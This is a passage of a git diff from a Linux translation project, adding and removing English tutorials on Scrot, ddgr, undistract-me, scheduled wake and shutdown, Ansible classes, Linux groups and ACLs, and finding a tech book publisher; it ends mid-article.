[What is Linux?][1] + +* [What are Linux containers?][2] + +* [Download Now: Linux commands cheat sheet][3] + +* [Advanced Linux commands cheat sheet][4] + +* [Our latest Linux articles][5] + +Many Linux distributions come with Scrot already installed—to check, type `which scrot`. If it isn't there, you can install Scrot using your distro's package manager. If you're willing to compile the code, grab it [from GitHub][22]. + +To take a screen capture, crack open a terminal window and type `scrot [filename]`, where `[filename]` is the name of file to which you want to save the image (for example, `desktop.png`). If you don't include a name for the file, Scrot will create one for you, such as `2017-09-24-185009_1687x938_scrot.png`. (That filename isn't as descriptive it could be, is it? That's why it's better to add one to the command.) + +Running Scrot with no options takes a screen capture of your entire desktop. If you don't want to do that, Scrot lets you focus on smaller portions of your screen. + +### Taking a screen capture of a single window + +Tell Scrot to take a screen capture of a single window by typing `scrot -u [filename]`. + +The `-u` option tells Scrot to grab the window currently in focus. That's usually the terminal window you're working in, which might not be the one you want. + +To grab another window on your desktop, type `scrot -s [filename]`. + +The `-s` option lets you do one of two things: + +* select an open window, or + +* draw a rectangle around a window or a portion of a window to capture it. + +You can also set a delay, which gives you a little more time to select the window you want to capture. To do that, type `scrot -u -d [num] [filename]`. + +The `-d` option tells Scrot to wait before grabbing the window, and `[num]` is the number of seconds to wait. Specifying `-d 5` (wait five seconds) should give you enough time to choose a window. + +### More useful options + +Scrot offers a number of additional features (most of which I never use). The ones I find most useful include: + +* `-b` also grabs the window's border + +* `-t` grabs a window and creates a thumbnail of it. This can be useful when you're posting screen captures online. + +* `-c` creates a countdown in your terminal when you use the `-d` option. + +To learn about Scrot's other options, check out the its documentation by typing `man scrot` in a terminal window, or [read it online][17]. Then start snapping images of your screen. + +It's basic, but Scrot gets the job done nicely. + +### Topics + + [Linux][23] + +### About the author + + [![That idiot Scott Nesbitt ...](https://opensource.com/sites/default/files/styles/profile_pictures/public/scottn-cropped.jpg?itok=q4T2J4Ai)][18] + + Scott Nesbitt - I'm a long-time user of free/open source software, and write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web: [Twitter][7], [Mastodon][8], [GitHub][9], and... [more about Scott Nesbitt][10][More about me][11] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot + +作者:[ Scott Nesbitt  ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot?rate=H43kUdawjR0GV9D0dCbpnmOWcqw1WekfrAI_qKo8UwI +[7]:http://www.twitter.com/ScottWNesbitt +[8]:https://mastodon.social/@scottnesbitt +[9]:https://github.com/ScottWNesbitt +[10]:https://opensource.com/users/scottnesbitt +[11]:https://opensource.com/users/scottnesbitt +[12]:https://opensource.com/user/14925/feed +[13]:https://creativecommons.org/licenses/by-sa/4.0/ +[14]:https://www.kde.org/applications/graphics/ksnapshot/ +[15]:https://launchpad.net/shutter +[16]:https://github.com/dreamer/scrot +[17]:http://manpages.ubuntu.com/manpages/precise/man1/scrot.1.html +[18]:https://opensource.com/users/scottnesbitt +[19]:https://opensource.com/users/scottnesbitt +[20]:https://opensource.com/users/scottnesbitt +[21]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot#comments +[22]:https://github.com/dreamer/scrot +[23]:https://opensource.com/tags/linux diff --git a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md deleted file mode 100644 index ee451a6172..0000000000 --- a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md +++ /dev/null @@ -1,103 +0,0 @@ -translating---geekpi - -# Search DuckDuckGo from the Command Line - - ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) -When we showed you how to [search Google from the command line][3] a lot of you to say you use [Duck Duck Go][4], the awesome privacy-focused search engine. - -Well, now there’s a tool to search DuckDuckGo from the command line. It’s called [ddgr][6] (pronounced, in my head, as  _dodger_ ) and it’s pretty neat. - -Like [Googler][7], ddgr is totally open-source and totally unofficial. Yup, the app is unaffiliated with DuckDuckGo in any way. So, should it start returning unsavoury search results for innocent terms, make sure you quack in this dev’s direction, and not the search engine’s! - -### DuckDuckGo Terminal App - -![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/ddgr-gif.gif) - -[DuckDuckGo Bangs][8] makes finding stuff on DuckDuckGo super easy (there’s even a bang for  _this_  site) and, dutifully, ddgr supports them. - -Unlike the web interface, you can specify the number of search results you would like to see per page. It’s more convenient than skimming through 30-odd search results per page. The default interface is carefully designed to use minimum space without sacrificing readability. - -`ddgr` has a number of features, including: - -* Choose number of search results to fetch - -* Support for Bash autocomplete - -* Use !bangs - -* Open URLs in a browser - -* “I’m feeling lucky” option - -* Filter by time, region, file type, etc - -* Minimal dependencies - -You can download `ddgr` for various systems direct from the Github project page: - -[Download ‘ddgr’ from Github][9] - -You can also install ddgr on Ubuntu 16.04 LTS and up from a PPA. This repo is maintained by the developer of ddgr and is recommended should you want to stay up-to-date with new releases as and when they appear. - -Do note that at the time of writing the latest version of ddgr is  _not_  in the PPA, but an older version (lacking –num support) is: - -``` -sudo add-apt-repository ppa:twodopeshaggy/jarun -``` - -``` -sudo apt-get update -``` - -### How To Use ddgr to Search DuckDuckGo from the Comand Line - -To use ddgr once you installed all you need to do is pop open your terminal emulator of choice and run: - -``` -ddgr -``` - -Next enter a search term: - -``` -search-term -``` - -To limit the number of results returned run: - -``` -ddgr --num 5 search-term -``` - -To instantly open the first matching result for a search term in your browser run: - -``` -ddgr -j search-term -``` - -You can pass arguments and flags to narrow down your search. To see a comprehensive list inside the terminal run: - -``` -ddgr -h -``` - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app - -作者:[JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/download -[3]:http://www.omgubuntu.co.uk/2017/08/search-google-from-the-command-line -[4]:http://duckduckgo.com/ -[5]:http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app -[6]:https://github.com/jarun/ddgr -[7]:https://github.com/jarun/googler -[8]:https://duckduckgo.com/bang -[9]:https://github.com/jarun/ddgr/releases/tag/v1.1 diff --git a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md new file mode 100644 index 0000000000..46afe9b893 --- /dev/null +++ b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md @@ -0,0 +1,156 @@ +translating---geekpi + +Undistract-me : Get Notification When Long Running Terminal Commands Complete +============================================================ + +by [sk][2] · November 30, 2017 + +![Undistract-me](https://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2-720x340.png) + +A while ago, we published how to [get notification when a Terminal activity is done][3]. Today, I found out a similar utility called “undistract-me” that notifies you when long running terminal commands complete. Picture this scenario. You run a command that takes a while to finish. In the mean time, you check your facebook and get so involved in it. After a while, you remembered that you ran a command few minutes ago. You go back to the Terminal and notice that the command has already finished. But you have no idea when the command is completed. Have you ever been in this situation? I bet most of you were in this situation many times. This is where “undistract-me” comes in help. You don’t need to constantly check the terminal to see if a command is completed or not. Undistract-me utility will notify you when a long running command is completed. It will work on Arch Linux, Debian, Ubuntu and other Ubuntu-derivatives. + +#### Installing Undistract-me + +Undistract-me is available in the default repositories of Debian and its variants such as Ubuntu. All you have to do is to run the following command to install it. + +``` +sudo apt-get install undistract-me +``` + +The Arch Linux users can install it from AUR using any helper programs. + +Using [Pacaur][4]: + +``` +pacaur -S undistract-me-git +``` + +Using [Packer][5]: + +``` +packer -S undistract-me-git +``` + +Using [Yaourt][6]: + +``` +yaourt -S undistract-me-git +``` + +Then, run the following command to add “undistract-me” to your Bash. + +``` +echo 'source /etc/profile.d/undistract-me.sh' >> ~/.bashrc +``` + +Alternatively you can run this command to add it to your Bash: + +``` +echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .bashrc +``` + +If you are in Zsh shell, run this command: + +``` +echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .zshrc +``` + +Finally update the changes: + +For Bash: + +``` +source ~/.bashrc +``` + +For Zsh: + +``` +source ~/.zshrc +``` + +#### Configure Undistract-me + +By default, Undistract-me will consider any command that takes more than 10 seconds to complete as a long-running command. You can change this time interval by editing /usr/share/undistract-me/long-running.bash file. + +``` +sudo nano /usr/share/undistract-me/long-running.bash +``` + +Find “LONG_RUNNING_COMMAND_TIMEOUT” variable and change the default value (10 seconds) to something else of your choice. + + [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] + +Save and close the file. Do not forget to update the changes: + +``` +source ~/.bashrc +``` + +Also, you can disable notifications for particular commands. To do so, find the “LONG_RUNNING_IGNORE_LIST” variable and add the commands space-separated like below. + +By default, the notification will only show if the active window is not the window the command is running in. That means, it will notify you only if the command is running in the background Terminal window. If the command is running in active window Terminal, you will not be notified. If you want undistract-me to send notifications either the Terminal window is visible or in the background, you can set IGNORE_WINDOW_CHECK to 1 to skip the window check. + +The other cool feature of Undistract-me is you can set audio notification along with visual notification when a command is done. By default, it will only send a visual notification. You can change this behavior by setting the variable UDM_PLAY_SOUND to a non-zero integer on the command line. However, your Ubuntu system should have pulseaudio-utils and sound-theme-freedesktop utilities installed to enable this functionality. + +Please remember that you need to run the following command to update the changes made. + +For Bash: + +``` +source ~/.bashrc +``` + +For Zsh: + +``` +source ~/.zshrc +``` + +It is time to verify if this really works. + +#### Get Notification When Long Running Terminal Commands Complete + +Now, run any command that takes longer than 10 seconds or the time duration you defined in Undistract-me script. + +I ran the following command on my Arch Linux desktop. + +``` +sudo pacman -Sy +``` + +This command took 32 seconds to complete. After the completion of the above command, I got the following notification. + + [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] + +Please remember Undistract-me script notifies you only if the given command took more than 10 seconds to complete. If the command is completed in less than 10 seconds, you will not be notified. Of course, you can change this time interval settings as I described in the Configuration section above. + +I find this tool very useful. It helped me to get back to the business after I completely lost in some other tasks. I hope this tool will be helpful to you too. + +More good stuffs to come. Stay tuned! + +Cheers! + +Resource: + +* [Undistract-me GitHub Repository][1] + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal-commands-complete/ + +作者:[sk][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://github.com/jml/undistract-me +[2]:https://www.ostechnix.com/author/sk/ +[3]:https://www.ostechnix.com/get-notification-terminal-task-done/ +[4]:https://www.ostechnix.com/install-pacaur-arch-linux/ +[5]:https://www.ostechnix.com/install-packer-arch-linux-2/ +[6]:https://www.ostechnix.com/install-yaourt-arch-linux/ +[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png +[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md new file mode 100644 index 0000000000..3a2c20ad52 --- /dev/null +++ b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -0,0 +1,135 @@ + + translating by HardworkFish + +Wake up and Shut Down Linux Automatically +============================================================ + +### [banner.jpg][1] + +![time keeper](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner.jpg?itok=zItspoSb) + +Learn how to configure your Linux computers to watch the time for you, then wake up and shut down automatically. + +[Creative Commons Attribution][6][The Observatory at Delhi][7] + +Don't be a watt-waster. If your computers don't need to be on then shut them down. For convenience and nerd creds, you can configure your Linux computers to wake up and shut down automatically. + +### Precious Uptimes + +Some computers need to be on all the time, which is fine as long as it's not about satisfying an uptime compulsion. Some people are very proud of their lengthy uptimes, and now that we have kernel hot-patching that leaves only hardware failures requiring shutdowns. I think it's better to be practical. Save electricity as well as wear on your moving parts, and shut them down when they're not needed. For example, you can wake up a backup server at a scheduled time, run your backups, and then shut it down until it's time for the next backup. Or, you can configure your Internet gateway to be on only at certain times. Anything that doesn't need to be on all the time can be configured to turn on, do a job, and then shut down. + +### Sleepies + +For computers that don't need to be on all the time, good old cron will shut them down reliably. Use either root's cron, or /etc/crontab. This example creates a root cron job to shut down every night at 11:15 p.m. + +``` +# crontab -e -u root +# m h dom mon dow command +15 23 * * * /sbin/shutdown -h now +``` + +``` +15 23 * * 1-5 /sbin/shutdown -h now +``` + +You may also use /etc/crontab, which is fast and easy, and everything is in one file. You have to specify the user: + +``` +15 23 * * 1-5 root shutdown -h now +``` + +Auto-wakeups are very cool; most of my SUSE colleagues are in Nuremberg, so I am crawling out of bed at 5 a.m. to have a few hours of overlap with their schedules. My work computer turns itself on at 5:30 a.m., and then all I have to do is drag my coffee and myself to my desk to start work. It might not seem like pressing a power button is a big deal, but at that time of day every little thing looms large. + +Waking up your Linux PC can be less reliable than shutting it down, so you may want to try different methods. You can use wakeonlan, RTC wakeups, or your PC's BIOS to set scheduled wakeups. These all work because, when you power off your computer, it's not really all the way off; it is in an extremely low-power state and can receive and respond to signals. You need to use the power supply switch to turn it off completely. + +### BIOS Wakeup + +A BIOS wakeup is the most reliable. My system BIOS has an easy-to-use wakeup scheduler (Figure 1). Chances are yours does, too. Easy peasy. + +### [fig-1.png][2] + +![wake up](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_11.png?itok=8qAeqo1I) + +Figure 1: My system BIOS has an easy-to-use wakeup scheduler. + +[Used with permission][8] + +### wakeonlan + +wakeonlan is the next most reliable method. This requires sending a signal from a second computer to the computer you want to power on. You could use an Arduino or Raspberry Pi to send the wakeup signal, a Linux-based router, or any Linux PC. First, look in your system BIOS to see if wakeonlan is supported -- which it should be -- and then enable it, as it should be disabled by default. + +Then, you'll need an Ethernet network adapter that supports wakeonlan; wireless adapters won't work. You'll need to verify that your Ethernet card supports wakeonlan: + +``` +# ethtool eth0 | grep -i wake-on + Supports Wake-on: pumbg + Wake-on: g +``` + +* d -- all wake ups disabled + +* p -- wake up on physical activity + +* u -- wake up on unicast messages + +* m -- wake up on multicast messages + +* b -- wake up on broadcast messages + +* a -- wake up on ARP messages + +* g -- wake up on magic packet + +* s -- set the Secure On password for the magic packet + +man ethtool is not clear on what the p switch does; it suggests that any signal will cause a wake up. In my testing, however, it doesn't do that. The one that must be enabled is g -- wake up on magic packet, and the Wake-on line shows that it is already enabled. If it is not enabled, you can use ethtool to enable it, using your own device name, of course: + +``` +# ethtool -s eth0 wol g +``` + +``` +@reboot /usr/bin/ethtool -s eth0 wol g +``` + +### [fig-2.png][3] + +![wakeonlan](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_7.png?itok=XQAwmHoQ) + +Figure 2: Enable Wake on LAN. + +[Used with permission][9] + +Another option is recent Network Manager versions have a nice little checkbox to enable wakeonlan (Figure 2). + +There is a field for setting a password, but if your network interface doesn't support the Secure On password, it won't work. + +Now you need to configure a second PC to send the wakeup signal. You don't need root privileges, so create a cron job for your user. You need the MAC address of the network interface on the machine you're waking up: + +``` +30 08 * * * /usr/bin/wakeonlan D0:50:99:82:E7:2B +``` + +Using the real-time clock for wakeups is the least reliable method. Check out [Wake Up Linux With an RTC Alarm Clock][4]; this is a bit outdated as most distros use systemd now. Come back next week to learn more about updated ways to use RTC wakeups. + +Learn more about Linux through the free ["Introduction to Linux" ][5]course from The Linux Foundation and edX. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux-automatically + +作者:[Carla Schroder] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.linux.com/files/images/bannerjpg +[2]:https://www.linux.com/files/images/fig-1png-11 +[3]:https://www.linux.com/files/images/fig-2png-7 +[4]:https://www.linux.com/learn/wake-linux-rtc-alarm-clock +[5]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[6]:https://www.linux.com/licenses/category/creative-commons-attribution +[7]:http://www.columbia.edu/itc/mealac/pritchett/00routesdata/1700_1799/jaipur/delhijantarearly/delhijantarearly.html +[8]:https://www.linux.com/licenses/category/used-permission +[9]:https://www.linux.com/licenses/category/used-permission diff --git a/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md b/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md new file mode 100644 index 0000000000..a74b196663 --- /dev/null +++ b/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md @@ -0,0 +1,71 @@ +### [Fedora Classroom Session: Ansible 101][2] + +### By Sachin S Kamath + +![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) + +Fedora Classroom sessions continue this week with an Ansible session. The general schedule for sessions appears [on the wiki][3]. You can also find [resources and recordings from previous sessions][4] there. Here are details about this week’s session on [Thursday, 30th November at 1600 UTC][5]. That link allows you to convert the time to your timezone. + +### Topic: Ansible 101 + +As the Ansible [documentation][6] explains, Ansible is an IT automation tool. It’s primarily used to configure systems, deploy software, and orchestrate more advanced IT tasks. Examples include continuous deployments or zero downtime rolling updates. + +This Classroom session covers the topics listed below: + +1. Introduction to SSH + +2. Understanding different terminologies + +3. Introduction to Ansible + +4. Ansible installation and setup + +5. Establishing password-less connection + +6. Ad-hoc commands + +7. Managing inventory + +8. Playbooks examples + +There will also be a follow-up Ansible 102 session later. That session will cover complex playbooks, roles, dynamic inventory files, control flow and Galaxy. + +### Instructors + +We have two experienced instructors handling this session. + +[Geoffrey Marr][7], also known by his IRC name as “coremodule,” is a Red Hat employee and Fedora contributor with a background in Linux and cloud technologies. While working, he spends his time lurking in the [Fedora QA][8] wiki and test pages. Away from work, he enjoys RaspberryPi projects, especially those focusing on software-defined radio. + +[Vipul Siddharth][9] is an intern at Red Hat who also works on Fedora. He loves to contribute to open source and seeks opportunities to spread the word of free and open source software. + +### Joining the session + +This session takes place on [BlueJeans][10]. The following information will help you join the session: + +* URL: [https://bluejeans.com/3466040121][1] + +* Meeting ID (for Desktop App): 3466040121 + +We hope you attend, learn from, and enjoy this session! If you have any feedback about the sessions, have ideas for a new one or want to host a session, please feel free to comment on this post or edit the [Classroom wiki page][11]. + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/fedora-classroom-session-ansible-101/ + +作者:[Sachin S Kamath] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://bluejeans.com/3466040121 +[2]:https://fedoramagazine.org/fedora-classroom-session-ansible-101/ +[3]:https://fedoraproject.org/wiki/Classroom +[4]:https://fedoraproject.org/wiki/Classroom#Previous_Sessions +[5]:https://www.timeanddate.com/worldclock/fixedtime.html?msg=Fedora+Classroom+-+Ansible+101&iso=20171130T16&p1=%3A +[6]:http://docs.ansible.com/ansible/latest/index.html +[7]:https://fedoraproject.org/wiki/User:Coremodule +[8]:https://fedoraproject.org/wiki/QA +[9]:https://fedoraproject.org/wiki/User:Siddharthvipul1 +[10]:https://www.bluejeans.com/downloads +[11]:https://fedoraproject.org/wiki/Classroom diff --git a/sources/tech/20171201 How to Manage Users with Groups in Linux.md b/sources/tech/20171201 How to Manage Users with Groups in Linux.md new file mode 100644 index 0000000000..35350c819f --- /dev/null +++ b/sources/tech/20171201 How to Manage Users with Groups in Linux.md @@ -0,0 +1,168 @@ +translating---imquanquan + +How to Manage Users with Groups in Linux +============================================================ + +### [group-of-people-1645356_1920.jpg][1] + +![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) + +Learn how to work with users, via groups and access control lists in this tutorial. + +[Creative Commons Zero][4] + +Pixabay + +When you administer a Linux machine that houses multiple users, there might be times when you need to take more control over those users than the basic user tools offer. This idea comes to the fore especially when you need to manage permissions for certain users. Say, for example, you have a directory that needs to be accessed with read/write permissions by one group of users and only read permissions for another group. With Linux, this is entirely possible. To make this happen, however, you must first understand how to work with users, via groups and access control lists (ACLs). + +We’ll start from the beginning with users and work our way to the more complex ACLs. Everything you need to make this happen will be included in your Linux distribution of choice. We won’t touch on the basics of users, as the focus on this article is about groups. + +For the purpose of this piece, I’m going to assume the following: + +You need to create two users with usernames: + +* olivia + +* nathan + +You need to create two groups: + +* readers + +* editors + +Olivia needs to be a member of the group editors, while nathan needs to be a member of the group readers. The group readers needs to only have read permission to the directory /DATA, whereas the group editors needs to have both read and write permission to the /DATA directory. This, of course, is very minimal, but it will give you the basic information you need to expand the tasks to fit your much larger needs. + +I’ll be demonstrating on the Ubuntu 16.04 Server platform. The commands will be universal—the only difference would be if your distribution of choice doesn’t make use of sudo. If this is the case, you’ll have to first su to the root user to issue the commands that require sudo in the demonstrations. + +### Creating the users + +The first thing we need to do is create the two users for our experiment. User creation is handled with the useradd command. Instead of just simply creating the users we need to create them both with their own home directories and then give them passwords. + +The first thing we do is create the users. To do this, issue the commands: + +``` +sudo useradd -m olivia + +sudo useradd -m nathan +``` + +Next each user must have a password. To add passwords into the mix, you’d issue the following commands: + +``` +sudo passwd olivia + +sudo passwd nathan +``` + +That’s it, your users are created. + +### Creating groups and adding users + +Now we’re going to create the groups readers and editors and then add users to them. The commands to create our groups are: + +``` +addgroup readers + +addgroup editors +``` + +### [groups_1.jpg][2] + +![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) + +Figure 1: Our new groups ready to be used. + +[Used with permission][5] + +With our groups created, we need to add our users. We’ll add user nathan to group readers with the command: + +``` +sudo usermod -a -G readers nathan +``` + +``` +sudo usermod -a -G editors olivia +``` + +### Giving groups permissions to directories + +Let’s say you have the directory /READERS and you need to allow all members of the readers group access to that directory. First, change the group of the folder with the command: + +``` +sudo chown -R :readers /READERS +``` + +``` +sudo chmod -R g-w /READERS +``` + +``` +sudo chmod -R o-x /READERS +``` + +Let’s say you have the directory /EDITORS and you need to give members of the editors group read and write permission to its contents. To do that, the following command would be necessary: + +``` +sudo chown -R :editors /EDITORS + +sudo chmod -R g+w /EDITORS + +sudo chmod -R o-x /EDITORS +``` + +The problem with using this method is you can only add one group to a directory at a time. This is where access control lists come in handy. + +### Using access control lists + +Now, let’s get tricky. Say you have a single folder—/DATA—and you want to give members of the readers group read permission and members of the group editors read/write permissions. To do that, you must take advantage of the setfacl command. The setfacl command sets file access control lists for files and folders. + +The structure of this command looks like this: + +``` +setfacl OPTION X:NAME:Y /DIRECTORY +``` + +``` +sudo setfacl -m g:readers:rx -R /DATA +``` + +To give members of the editors group read/write permissions (while retaining read permissions for the readers group), we’d issue the command; + +``` +sudo setfacl -m g:editors:rwx -R /DATA +``` + +### All the control you need + +And there you have it. You can now add members to groups and control those groups’ access to various directories with all the power and flexibility you need. To read more about the above tools, issue the commands: + +* man usradd + +* man addgroup + +* man usermod + +* man sefacl + +* man chown + +* man chmod + +Learn more about Linux through the free ["Introduction to Linux" ][3]course from The Linux Foundation and edX. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux + +作者:[Jack Wallen ] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.linux.com/files/images/group-people-16453561920jpg +[2]:https://www.linux.com/files/images/groups1jpg +[3]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[4]:https://www.linux.com/licenses/category/creative-commons-zero +[5]:https://www.linux.com/licenses/category/used-permission diff --git a/sources/tech/20171201 How to find a publisher for your tech book.md b/sources/tech/20171201 How to find a publisher for your tech book.md new file mode 100644 index 0000000000..76dc8112ca --- /dev/null +++ b/sources/tech/20171201 How to find a publisher for your tech book.md @@ -0,0 +1,76 @@ +How to find a publisher for your tech book +============================================================ + +### Writing a technical book takes more than a good idea. You need to know a bit about how the publishing industry works. + + +![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book") +Image by : opensource.com + +You've got an idea for a technical book—congratulations! Like a hiking the Appalachian trail, or learning to cook a soufflé, writing a book is one of those things that people talk about, but never take beyond the idea stage. That makes sense, because the failure rate is pretty high. Making it real involves putting your idea in front of a publisher, and finding out whether it's good enough to become a book. That step is scary enough, but the lack of information about how to do it complicates matters. + +If you want to work with a traditional publisher, you'll need to get your book in front of them and hopefully start on the path to publication. I'm the Managing Editor at the [Pragmatic Bookshelf][4], so I see proposals all the time, as well as helping authors to craft good ones. Some are good, others are bad, but I often see proposals that just aren't right for Pragmatic. I'll help you with the process of finding the right publisher, and how to get your idea noticed. + +### Identify your target + +Your first step is to figure out which publisher is the a good fit for your idea. To start, think about the publishers that you buy books from, and that you enjoy. The odds are pretty good that your book will appeal to people like you, so starting with your favorites makes for a pretty good short list. If you don't have much of a book collection, you can visit a bookstore, or take a look on Amazon. Make a list of a handful of publishers that you personally like to start with. + +Next, winnow your prospects. Although most technical publishers look alike from a distance, they often have distinctive audiences. Some publishers go for broadly popular topics, such as C++ or Java. Your book on Elixir may not be a good fit for that publisher. If your prospective book is about teaching programming to kids, you probably don't want to go with the traditional academic publisher. + +Once you've identified a few targets, do some more research into the publishers' catalogs, either on their own site, or on Amazon. See what books they have that are similar to your idea. If they have a book that's identical, or nearly so, you'll have a tough time convincing them to sign yours. That doesn't necessarily mean you should drop that publisher from your list. You can make some changes to your proposal to differentiate it from the existing book: target a different audience, or a different skill level. Maybe the existing book is outdated, and you could focus on new approaches to the technology. Make your proposal into a book that complements the existing one, rather than competes. + +If your target publisher has no books that are similar, that can be a good sign, or a very bad one. Sometimes publishers choose not to publish on specific technologies, either because they don't believe their audience is interested, or they've had trouble with that technology in the past. New languages and libraries pop up all the time, and publishers have to make informed guesses about which will appeal to their readers. Their assessment may not be the same as yours. Their decision might be final, or they might be waiting for the right proposal. The only way to know is to propose and find out. + +### Work your network + +Identifying a publisher is the first step; now you need to make contact. Unfortunately, publishing is still about  _who_  you know, more than  _what_  you know. The person you want to know is an  _acquisitions editor,_  the editor whose job is to find new markets, authors, and proposals. If you know someone who has connections with a publisher, ask for an introduction to an acquisitions editor. These editors often specialize in particular subject areas, particularly at larger publishers, but you don't need to find the right one yourself. They're usually happy to connect you with the correct person. + +Sometimes you can find an acquisitions editor at a technical conference, especially one where the publisher is a sponsor, and has a booth. Even if there's not an acquisitions editor on site at the time, the staff at the booth can put you in touch with one. If conferences aren't your thing, you'll need to work your network to get an introduction. Use LinkedIn, or your informal contacts, to get in touch with an editor. + +For smaller publishers, you may find acquisitions editors listed on the company website, with contact information if you're lucky. If not, search for the publisher's name on Twitter, and see if you can turn up their editors. You might be nervous about trying to reach out to a stranger over social media to show them your book, but don't worry about it. Making contact is what acquisitions editors do. The worst-case result is they ignore you. + +Once you've made contact, the acquisitions editor will assist you with the next steps. They may have some feedback on your proposal right away, or they may want you to flesh it out according to their guidelines before they'll consider it. After you've put in the effort to find an acquisitions editor, listen to their advice. They know their system better than you do. + +### If all else fails + +If you can't find an acquisitions editor to contact, the publisher almost certainly has a blind proposal alias, usually of the form `proposals@[publisher].com`. Check the web site for instructions on what to send to a proposal alias; some publishers have specific requirements. Follow these instructions. If you don't, you have a good chance of your proposal getting thrown out before anybody looks at it. If you have questions, or aren't sure what the publisher wants, you'll need to try again to find an editor to talk to, because the proposal alias is not the place to get questions answered. Put together what they've asked for (which is a topic for a separate article), send it in, and hope for the best. + +### And ... wait + +No matter how you've gotten in touch with a publisher, you'll probably have to wait. If you submitted to the proposals alias, it's going to take a while before somebody does anything with that proposal, especially at a larger company. Even if you've found an acquisitions editor to work with, you're probably one of many prospects she's working with simultaneously, so you might not get rapid responses. Almost all publishers have a committee that decides on which proposals to accept, so even if your proposal is awesome and ready to go, you'll still need to wait for the committee to meet and discuss it. You might be waiting several weeks, or even a month before you hear anything. + +After a couple of weeks, it's fine to check back in with the editor to see if they need any more information. You want to be polite in this e-mail; if they haven't answered because they're swamped with proposals, being pushy isn't going to get 